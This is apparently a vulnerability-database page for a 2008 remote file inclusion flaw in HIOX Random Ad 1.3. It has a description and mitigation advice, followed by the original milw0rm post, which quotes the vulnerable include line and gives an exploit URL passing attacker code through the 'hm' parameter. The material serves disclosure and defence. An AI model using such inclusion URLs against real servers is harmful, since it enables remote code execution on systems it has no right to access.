HIOX Random Ad 1.3 (hioxRandomAd.php hm) RFI Vulnerability

vendor:

HIOX Random Ad

by:

Ghost Hacker

7.5

CVSS

HIGH

Remote File Inclusion (RFI)

CWE

Product Name: HIOX Random Ad

Affected Version From: 1.3

Affected Version To: 1.3

Patch Exists: NO

Related CWE: N/A

CPE: a:hscripts:hiox_random_ad:1.3

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

HIOX Random Ad 1.3 (hioxRandomAd.php hm) RFI Vulnerability

HIOX Random Ad 1.3 is vulnerable to a Remote File Inclusion (RFI) vulnerability. The vulnerability is due to the 'hm' parameter in 'hioxRandomAd.php' script not properly sanitized before being used in an 'include' function call. This can be exploited to include arbitrary remote files by passing an URL as the 'hm' parameter. Successful exploitation requires that 'allow_url_include' is set to 'On' in the 'php.ini' file.

Mitigation:

Ensure that user-supplied input is properly sanitized before being used in an 'include' function call. Additionally, ensure that 'allow_url_include' is set to 'Off' in the 'php.ini' file.

Source

Exploit-DB raw data:

####################################################################################################
 HIOX Random Ad 1.3 (hioxRandomAd.php hm) RFI Vulnerability
 Ghost Hacker , R-h Team , Real Hack We Will Be Back Soon  :) 
####################################################################################################
[~] Found by : Ghost Hacker  - R-H Team -                      |,  .-.  .-.  ,|
[~] My Blog : http://gh0st10.wordpress.com                     | )(_o/  \o_)( |
[~] My Email : Ghost-r00t@Hotmail.com                          |/     /\     \|
[~] Name Script : HIOX Random Ad 1.3
[~] Download : http://www.hscripts.com/scripts/php/downloads/HRA_1_3.zip
#############################[ I love the Messenger of Allah Mohammad ]#############################
[~] Error (hioxRandomAd.php) :
include "$hm/admin/props.php";
[~] Exploit :
http://xxxx.com/[path]/hioxRandomAd.php?hm=Evil_Code
#############################[ I love the Messenger of Allah Mohammad ]#############################
[~] Greetz :
Mr.SaFa7 & Night Mare & Root Hacker & Dmar al3noOoz ,
All Members Real Hack & Members Arabs Security And All My Friends ,
####################################################################################################
 Ghost Hacker , R-h Team , Real Hack We Will Be Back Soon  :) 
####################################################################################################

# milw0rm.com [2008-07-30]